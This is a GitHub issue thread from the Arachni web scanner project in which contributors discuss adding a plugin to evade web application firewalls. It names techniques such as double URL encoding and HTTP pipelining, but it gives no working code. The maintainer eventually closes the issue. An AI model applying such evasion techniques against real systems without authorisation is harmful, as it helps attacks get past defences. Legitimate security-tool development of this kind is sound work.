WAF Evasion Plugin #44

Closed
msidagni opened this Issue Jun 23, 2011 · 17 comments

Comments

Projects
None yet
3 participants

Create a arachni waf evasion plugin now that you already have a WAF fingerprinting plugin. It should focus on the most common WAF: modsecurity, F5, Imperva, etc.

@ghost ghost assigned Zapotek Jun 23, 2011

Owner

Zapotek commented Jul 9, 2011

Same thing as for Issue #46, it would be cool but Arachni is a web app scanner not a WAF scanner.

So, I'm leaving this open indefinitely.

msidagni commented Jul 9, 2011

Tasos

It's not a matter of arachni becoming a WAF scanner. It's enabling arachni
to bypass WAF filters, feature that W3AF has already implemented even with
limited results. This will only enhance w3af feature set becauseit Will
allow to scan a web app even when it is protected by a WAF.

Cheers

Michelangelo
On Jul 9, 2011 6:28 AM, "Zapotek" <
reply@reply.github.com>
wrote:

Same thing as for Issue #46 (https://github.com/Zapotek/arachni/issues/46),
it would be cool but Arachni is a web app scanner not a WAF scanner.

So, I'm leaving this open indefinitely.

Reply to this email directly or view it on GitHub:
https://github.com/Zapotek/arachni/issues/44#issuecomment-1538086

Owner

Zapotek commented Jul 9, 2011

I disagree.
Any scan results that have been obtained while the webapp sits behind a WAF will be inaccurate, at best, which conflicts with the aim of the project.

If anyone wants to contribute such a feature-set it will be more than welcomed, in the meantime my focus stays put.

maybe we could do some URL obfuscation modules, like double encoding, etc.

Owner

Zapotek commented Mar 28, 2012

I could add the necessary hooks to the HTTP interface to make it easier for anyone who wants to implement something like that but I'm afraid that I'll have to stand by my last reply.
Obviously, anyone that who wants to develop that sort of plug-in will be having my full support but I can't spend time developing it myself.

I'll update this issue when I add the hook and a demo plug-in to show how it could work.

I can do it, since i wrote already a url obfuscation tool in ruby to help with some WAF evaluation.. should i do a pull request for this new plugin?

Owner

Zapotek commented Mar 28, 2012

Sure, I'll be pushing the stuff I mentioned in a while to give you an idea of how to intercept framework requests.

Zapotek added a commit that referenced this issue Mar 28, 2012

ok it is enough to implement some evasive techniques. Maybe we can talk about how to present the configuration options on the web/cli interface (like which kind of evasive technique the user want to use) or should it be boolean and for every single request when its enabled, we just try all evasive options that we implement?

Owner

Zapotek commented Mar 28, 2012

The Options have been lifted from Metasploit so if you've worked with it they should be familiar.
See for example: https://github.com/Zapotek/arachni/blob/experimental/plugins/vector_feed.rb#L217
These are the available options: https://github.com/Zapotek/arachni/blob/experimental/lib/arachni/component_options.rb

Owner

Zapotek commented Mar 28, 2012

Also, you can add obf sub-components for your plug-in, i.e. make your plug-in modular.
If that interests you I can write up a demo for that as well, it's really simple.

ok. I will first get it done then we talk about it again

Owner

Zapotek commented Mar 29, 2012

I'm guessing that the origin of the HTTP request would also be helpful to you (i.e. which component queued it) so if/when you need it let me know, it shouldn't be hard to implement.

yup. Your demo plugin is enough. I just have to clean up a backlog before (day job)

vpereira commented Apr 2, 2012

hi, I did implement three obfuscation methods, two url encoding and one about http pipeline. The main question is: what we want to test? How I do today. I get a WAF, i do configure a rule that I know that will be bocked and the I obfuscate it and try to evade the WAF. The point is, how should we do it here? See if we've got different responses for obfuscate GET and for normal GETs? any IDEA?

Owner

Zapotek commented Apr 2, 2012

Add your spec in:

`````` spec/arachni/plugins/_spec.rb```

Add your test server (which I'm guessing would have to emulate the WAF rules you're trying to evade) in:
spec/servers/arachni/plugins/<name>.rb

These folders don't exist atm because I haven't yet made it to the plugin specs.
Look around in the specs a bit to see how spec/server relationships work, it should be easy to grasp.

Let me know if you need any help.

vpereira commented Apr 2, 2012

ok

Owner

Zapotek commented Jun 29, 2013

Since I'm not particularly fond of this feature and no contribution was made by a 3rd party, closing this for good.

@Zapotek Zapotek closed this Jun 29, 2013

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment